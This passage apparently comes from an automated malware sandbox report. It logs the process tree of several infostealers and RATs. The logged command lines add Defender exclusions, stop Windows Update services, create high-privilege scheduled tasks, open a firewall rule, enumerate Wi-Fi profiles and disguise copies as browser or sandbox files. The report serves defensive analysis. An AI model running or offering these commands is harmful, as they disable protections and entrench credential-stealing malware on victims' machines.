        Suspicious use of WriteProcessMemory
        
        PID:3144
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2b2e3b62.bat" "
        6⤵
        
        PID:4636
    - - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\881C.tmp\881D.tmp\881E.bat C:\Users\Admin\AppData\Local\Temp\3582-490\log2.exe"
        5⤵
        
        PID:3316
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\a\FINAL%~1.EXE"
  2⤵
  - Executes dropped EXE
  - Drops file in Windows directory
  - Suspicious use of WriteProcessMemory
  PID:4624
- - C:\Users\Admin\AppData\Local\Temp\a\FINAL%~1.EXE
    C:\Users\Admin\AppData\Local\Temp\a\FINAL%~1.EXE
    3⤵
    - Executes dropped EXE
    PID:4756
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\a\ANTIMA~1.EXE"
  2⤵
  - Executes dropped EXE
  - Drops file in Windows directory
  PID:2704
- - C:\Users\Admin\AppData\Local\Temp\a\ANTIMA~1.EXE
    C:\Users\Admin\AppData\Local\Temp\a\ANTIMA~1.EXE
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4140
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      PID:1084
    - - C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
        5⤵
        
        PID:5660
      - C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        6⤵
        
        PID:8492
      - C:\Windows\SysWOW64\netsh.exe
        
        netsh wlan show profile
        6⤵
        
        PID:8160
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr All
        6⤵
        
        PID:4700
    - - C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
        5⤵
        
        PID:5816
      - C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        6⤵
        
        PID:3712
      - C:\Windows\SysWOW64\netsh.exe
        
        netsh wlan show networks mode=bssid
        6⤵
        
        PID:6624
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\a\justrat.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in Windows directory
  PID:3860
- - C:\Users\Admin\AppData\Local\Temp\a\justrat.exe
    C:\Users\Admin\AppData\Local\Temp\a\justrat.exe
    3⤵
    - Drops startup file
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4136
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd" /c ping 127.0.0.1 -n 21 > nul && copy "C:\Users\Admin\AppData\Local\Temp\a\justrat.exe" "C:\Program Files (x86)\windowssandbox.exe" && ping 127.0.0.1 -n 21 > nul && "C:\Program Files (x86)\windowssandbox.exe"
      4⤵
      PID:1648
    - - C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1 -n 21
        5⤵
        Runs ping.exe
        
        PID:4920
    - - C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1 -n 21
        5⤵
        Runs ping.exe
        
        PID:6728
    - - C:\Program Files (x86)\windowssandbox.exe
        
        "C:\Program Files (x86)\windowssandbox.exe"
        5⤵
        
        PID:7736
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
        6⤵
        
        PID:5500
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\a\VIDAR2~1.EXE"
  2⤵
  - Executes dropped EXE
  - Drops file in Windows directory
  PID:2716
- - C:\Users\Admin\AppData\Local\Temp\a\VIDAR2~1.EXE
    C:\Users\Admin\AppData\Local\Temp\a\VIDAR2~1.EXE
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    PID:5064
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      Blocklisted process makes network request
      Checks processor information in registry
      Modifies registry class
      Suspicious behavior: EnumeratesProcesses
      PID:2888
    - - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\PROGRA~3\KJDHCA~1.EXE"
        5⤵
        Drops file in Windows directory
        
        PID:5956
      - C:\PROGRA~3\KJDHCA~1.EXE
        
        C:\PROGRA~3\KJDHCA~1.EXE
        6⤵
        Suspicious use of SetThreadContext
        
        PID:5196
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        7⤵
        
        PID:5192
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        7⤵
        
        PID:5160
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        7⤵
        
        PID:5340
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5196 -s 332
        7⤵
        Program crash
        
        PID:5308
    - - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\KFIDAFBFBKFH" & exit
        5⤵
        
        PID:5624
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c timeout /t 10 & rd /s /q C:\ProgramData\KFIDAFBFBKFH & exit
        6⤵
        
        PID:688
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 10
        7⤵
        Delays execution with timeout.exe
        
        PID:6996
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5064 -s 292
      4⤵
      Program crash
      PID:1988
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\a\meta2806.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in Windows directory
  PID:3420
- - C:\Users\Admin\AppData\Local\Temp\a\meta2806.exe
    C:\Users\Admin\AppData\Local\Temp\a\meta2806.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:4660
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\a\LUMMA2~1.EXE"
  2⤵
  - Executes dropped EXE
  PID:908
- - C:\Users\Admin\AppData\Local\Temp\a\LUMMA2~1.EXE
    C:\Users\Admin\AppData\Local\Temp\a\LUMMA2~1.EXE
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    PID:924
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      Blocklisted process makes network request
      PID:4912
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 924 -s 300
      4⤵
      Program crash
      PID:3136
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\a\rise2806.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in Windows directory
  PID:5032
- - C:\Users\Admin\AppData\Local\Temp\a\rise2806.exe
    C:\Users\Admin\AppData\Local\Temp\a\rise2806.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    PID:1744
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      PID:2776
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe" /tn "MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea HR" /sc HOURLY /rl HIGHEST
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:900
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe" /tn "MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea LG" /sc ONLOGON /rl HIGHEST
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4912
    - - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\SPAN2Q~1\AC5CAU~1.EXE"
        5⤵
        
        PID:3680
      - C:\Users\Admin\AppData\Local\Temp\SPAN2Q~1\AC5CAU~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\SPAN2Q~1\AC5CAU~1.EXE
        6⤵
        
        PID:2816
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        7⤵
        
        PID:4240
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        7⤵
        
        PID:7044
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2816 -s 324
        7⤵
        Program crash
        
        PID:6512
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV168_e08a8d55b50864bc6ca07cda5a9c96c8\MSIUpdaterV168.exe" /tn "MSIUpdaterV168_e08a8d55b50864bc6ca07cda5a9c96c8 HR" /sc HOURLY /rl HIGHEST
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:6536
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV168_e08a8d55b50864bc6ca07cda5a9c96c8\MSIUpdaterV168.exe" /tn "MSIUpdaterV168_e08a8d55b50864bc6ca07cda5a9c96c8 LG" /sc ONLOGON /rl HIGHEST
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:6448
    - - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\SPAN2Q~1\PHUWP7~1.EXE"
        5⤵
        
        PID:5876
      - C:\Users\Admin\AppData\Local\Temp\SPAN2Q~1\PHUWP7~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\SPAN2Q~1\PHUWP7~1.EXE
        6⤵
        
        PID:7212
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        7⤵
        
        PID:7740
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 7212 -s 320
        7⤵
        Program crash
        
        PID:5428
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a\MSIUpdaterV168.exe" /tn "MSIUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a HR" /sc HOURLY /rl HIGHEST
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:7520
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a\MSIUpdaterV168.exe" /tn "MSIUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a LG" /sc ONLOGON /rl HIGHEST
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:6184
    - - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\SPAN2Q~1\MSO3LQ~1.EXE"
        5⤵
        
        PID:8056
      - C:\Users\Admin\AppData\Local\Temp\SPAN2Q~1\MSO3LQ~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\SPAN2Q~1\MSO3LQ~1.EXE
        6⤵
        
        PID:5736
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        7⤵
        
        PID:7832
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        7⤵
        
        PID:2592
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5736 -s 320
        7⤵
        Program crash
        
        PID:5192
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe" /tn "MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915 HR" /sc HOURLY /rl HIGHEST
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:7776
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe" /tn "MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915 LG" /sc ONLOGON /rl HIGHEST
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:6788
    - - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\SPAN2Q~1\X7X3EZ~1.EXE"
        5⤵
        
        PID:7960
      - C:\Users\Admin\AppData\Local\Temp\SPAN2Q~1\X7X3EZ~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\SPAN2Q~1\X7X3EZ~1.EXE
        6⤵
        
        PID:7760
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2776 -s 2176
        5⤵
        Program crash
        
        PID:1988
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1744 -s 324
      4⤵
      Program crash
      PID:416
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\a\GOOGLE~1.EXE"
  2⤵
  - Executes dropped EXE
  - Drops file in Windows directory
  PID:2608
- - C:\Users\Admin\AppData\Local\Temp\a\GOOGLE~1.EXE
    C:\Users\Admin\AppData\Local\Temp\a\GOOGLE~1.EXE
    3⤵
    - Drops startup file
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3320
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd" /c ping 127.0.0.1 -n 47 > nul && copy "C:\Users\Admin\AppData\Local\Temp\a\GOOGLE~1.EXE" "C:\Program Files (x86)\Google Chrome sandbox.exe.exe" && ping 127.0.0.1 -n 47 > nul && "C:\Program Files (x86)\Google Chrome sandbox.exe.exe"
      4⤵
      PID:4036
    - - C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1 -n 47
        5⤵
        Runs ping.exe
        
        PID:2424
    - - C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1 -n 47
        5⤵
        Runs ping.exe
        
        PID:6216
    - - C:\Program Files (x86)\Google Chrome sandbox.exe.exe
        
        "C:\Program Files (x86)\Google Chrome sandbox.exe.exe"
        5⤵
        
        PID:7500
      - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\PROGRA~2\WINDOW~2.EXE"
        6⤵
        
        PID:8244
        
        C:\PROGRA~2\WINDOW~2.EXE
        
        C:\PROGRA~2\WINDOW~2.EXE
        7⤵
        
        PID:112
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Program Files (x86)\windows defender (2).exe" "WINDOW~2.EXE" ENABLE
        8⤵
        Modifies Windows Firewall
        
        PID:2148
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
        6⤵
        
        PID:3420
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
        6⤵
        
        PID:7644
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
        7⤵
        
        PID:2420
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        8⤵
        
        PID:1728
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh wlan show profile
        8⤵
        
        PID:5908
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr All
        8⤵
        
        PID:4640
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
        7⤵
        
        PID:7412
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        8⤵
        
        PID:8676
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh wlan show networks mode=bssid
        8⤵
        
        PID:5736
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\a\asec.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in Windows directory
  PID:2356
- - C:\Users\Admin\AppData\Local\Temp\a\asec.exe
    C:\Users\Admin\AppData\Local\Temp\a\asec.exe
    3⤵
    - Modifies security service
    - Windows security bypass
    - Executes dropped EXE
    - Windows security modification
    - Modifies registry class
    PID:3936
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Windows\System32\cmd.exe" /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath $ENV:userprofile
      4⤵
      Executes dropped EXE
      Drops file in Windows directory
      PID:1988
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\System32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath $ENV:userprofile
        5⤵
        
        PID:3348
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath $ENV:userprofile
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4580
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS
      4⤵
      Executes dropped EXE
      Drops file in Windows directory
      PID:1356
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS
        5⤵
        
        PID:3712
      - C:\Windows\SysWOW64\sc.exe
        
        sc stop UsoSvc
        6⤵
        Launches sc.exe
        
        PID:3136
      - C:\Windows\SysWOW64\sc.exe
        
        sc stop WaaSMedicSvc
        6⤵
        Launches sc.exe
        
        PID:3084
      - C:\Windows\SysWOW64\sc.exe
        
        sc stop wuauserv
        6⤵
        Launches sc.exe
        
        PID:3752
      - C:\Windows\SysWOW64\sc.exe
        
        sc stop DoSvc
        6⤵
        Launches sc.exe
        
        PID:2480
      - C:\Windows\SysWOW64\sc.exe
        
        sc stop BITS
        6⤵
        Launches sc.exe
        
        PID:3200
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\a\crypt6.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in Windows directory
  PID:3452
- - C:\Users\Admin\AppData\Local\Temp\a\crypt6.exe
    C:\Users\Admin\AppData\Local\Temp\a\crypt6.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    PID:3836
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      PID:3632
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2932
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3836 -s 324
      4⤵
      Program crash
      PID:2516
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\a\1.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in Windows directory
  PID:3404
- - C:\Users\Admin\AppData\Local\Temp\a\1.exe
    C:\Users\Admin\AppData\Local\Temp\a\1.exe
    3⤵
    - Drops startup file
    - Executes dropped EXE
    - Adds Run key to start application
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    PID:4116
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\1.exe'
      4⤵
      Executes dropped EXE
      Drops file in Windows directory
      PID:5008
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\1.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3176
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '1.exe'
      4⤵
      Executes dropped EXE
      Drops file in Windows directory
      PID:2516
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '1.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:236
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\XClient.exe'
      4⤵
      Executes dropped EXE
      Drops file in Windows directory
      PID:4324
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\XClient.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4712
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
      4⤵
      Executes dropped EXE
      Drops file in Windows directory
      PID:3308
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1392
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClient" /tr "C:\Users\Admin\AppData\Roaming\XClient.exe"
      4⤵
      Executes dropped EXE
      Drops file in Windows directory
      PID:4088
    - - C:\Windows\SysWOW64\schtasks.exe
        
        C:\Windows\System32\schtasks.exe /create /f /RL HIGHEST /sc minute /mo 1 /tn XClient /tr C:\Users\Admin\AppData\Roaming\XClient.exe
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2636
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\a\AnyDesk.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in Windows directory
  PID:3084
- - C:\Users\Admin\AppData\Local\Temp\a\AnyDesk.exe
    C:\Users\Admin\AppData\Local\Temp\a\AnyDesk.exe
    3⤵
    - Executes dropped EXE
    - Checks processor information in registry
    PID:696
  - - C:\Users\Admin\AppData\Local\Temp\a\AnyDesk.exe
      "C:\Users\Admin\AppData\Local\Temp\a\AnyDesk.exe" --local-service
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious behavior: EnumeratesProcesses
      PID:4464
  - - C:\Users\Admin\AppData\Local\Temp\a\AnyDesk.exe
      "C:\Users\Admin\AppData\Local\Temp\a\AnyDesk.exe" --local-control
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of FindShellTrayWindow
      Suspicious use of SendNotifyMessage
      PID:1724
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\a\go.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in Windows directory
  PID:4948
- - C:\Users\Admin\AppData\Local\Temp\a\go.exe
    C:\Users\Admin\AppData\Local\Temp\a\go.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    PID:1576
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/account
      4⤵
      Executes dropped EXE
      Drops file in Windows directory
      Modifies registry class
      PID:1572
    - - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\msedge.exe" --single-argument https://www.youtube.com/account
        5⤵
        Executes dropped EXE
        Drops file in Windows directory
        
        PID:5620
      - C:\Users\Admin\AppData\Local\Temp\3582-490\msedge.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\msedge.exe --single-argument https://www.youtube.com/account
        6⤵
        Executes dropped EXE
        
        PID:5684
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/video
      4⤵
      Executes dropped EXE
      Drops file in Windows directory
      Modifies registry class
      PID:5564
    - - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\msedge.exe" --single-argument https://www.facebook.com/video
        5⤵
        Executes dropped EXE
        Drops file in Windows directory
        
        PID:5536
      - C:\Users\Admin\AppData\Local\Temp\3582-490\msedge.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\msedge.exe --single-argument https://www.facebook.com/video
        6⤵
        Executes dropped EXE
        
        PID:5768
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/
      4⤵
      Executes dropped EXE
      Drops file in Windows directory
      Modifies registry class
      PID:5392
    - - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\msedge.exe" --single-argument https://accounts.google.com/
        5⤵
        Executes dropped EXE
        Drops file in Windows directory
        
        PID:5688
      - C:\Users\Admin\AppData\Local\Temp\3582-490\msedge.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\msedge.exe --single-argument https://accounts.google.com/
        6⤵
        
        PID:5668
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\a\amadka.exe"
  2⤵
  - Executes dropped EXE
  PID:4364
- - C:\Users\Admin\AppData\Local\Temp\a\amadka.exe
    C:\Users\Admin\AppData\Local\Temp\a\amadka.exe
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Drops file in Windows directory
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of FindShellTrayWindow
    PID:1124
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\AD4097~1\explorti.exe"
      4⤵
      Executes dropped EXE
      Drops file in Windows directory
      PID:5628
    - - C:\Users\Admin\AppData\Local\Temp\AD4097~1\explorti.exe
        
        C:\Users\Admin\AppData\Local\Temp\AD4097~1\explorti.exe
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Modifies registry class
